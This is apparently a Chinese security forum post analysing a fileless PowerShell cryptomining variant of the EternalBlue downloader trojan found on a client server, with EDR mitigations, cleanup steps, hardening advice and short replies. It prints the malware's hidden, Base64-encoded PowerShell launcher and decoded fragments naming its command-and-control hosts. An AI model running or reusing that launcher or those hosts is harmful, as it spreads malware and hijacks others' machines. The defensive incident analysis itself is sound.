#原创分享#驱动人生木马全新升级开启powershell无文件挖矿新模式

1.根据客户反馈的问题现象是服务器经常会自动断网，断网后就自动重启，服务器遭受暴力破解攻击，先通过edr配置暴力破解检测，对攻击的IP进行封堵

2.     针对于服务器重启和断网的现象，我们通过EDR开启微隔离策略，配置外部访问服务器其他端口的流量全部拒绝，只允许业务流量访问

3.     针对于服务器存在的高级威胁攻击，我们可以通过阻止powershell脚本执行,这个病毒主要是利用永恒之蓝漏洞攻击的木马变种永恒之蓝下载器木马，新的木马变种更新“无文件”攻击模块，该版本的攻击代码全部以Powershell脚本形式执行

4.     新的攻击方式会在攻击后的Payload中直接在目标机器创建后门计划任务，并通过该计划任务将木马具有的多个恶意程序进行下载

5.     下面就是列举出服务器里面随机命名的计划任务，以及下载的木马，这是具体powershell执行的命令，解密后看到是下载一个木马文件，通过解码分析是存在挖矿行为

powershell.exe -NoP -NonI -W Hidden -EJABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuADcAaAA0AHUAawAuAGMAbwBtACcALAAnADEAOAA1AC4AMQAyADgALgA0ADMALgA2ADIAJwAsACcAaQBuAGYAbwAuADcAaAA0AHUAawAuAGMAbwBtACcAKQANAAoAJABuAGkAYwA9ACcAdQBwAGQAYQB0AGUALgA3AGgANAB1AGsALgBjAG8AbQAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAA

BASE64解密后得到的内容

$se=@('update.7h4uk.com','185.128.43.62','info.7h4uk.com')

$nic='update.7h4uk.com'

foreach($t in $se)

6.通过微步在线分析后发现是通过powershell在执行挖矿的动作

7.基本上现可以确认的是这是一次由永恒之蓝木马下载器变种利用powershell无文件攻击，远程下载木马病毒和挖矿脚本在内网挖矿，横向扩散，对服务器的处理建议如下

1.任务计划删除定时任务；

2.按顺序kill PID 3964、3180和cohernece.exe；

3.已在WMI中将root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver属性删除；

4.已删除cohernece.exe和antivirus*.htm

安全加固建议

1.服务器暂时关闭不必要的端口（如135-139、445）或者通过edr的微隔离进行访问限制

2.服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解

3.使用杀毒软件拦截可能的病毒攻击，任务计划删除定时任务

4.如果服务器用不到powershell，可以把这个程序卸载或者删除

您好，感谢您参与社区原创分享计划4，您的文章已被收录到计划中，交由专家评审小组评审，分享奖励将在活动结束后统一安排发放！分享越多，奖励越多，期待您更多的精彩分享哦！:感恩:

回帖是美德

???????????????????

学习打卡，感谢分享，虽然看的不是很明白

感谢楼主的分享，这个很重要。

感谢楼主的分享，这个很重要。

刚好想学习这个，感谢分享

都是实战经验，这波分享很强势

打卡学习，开心开心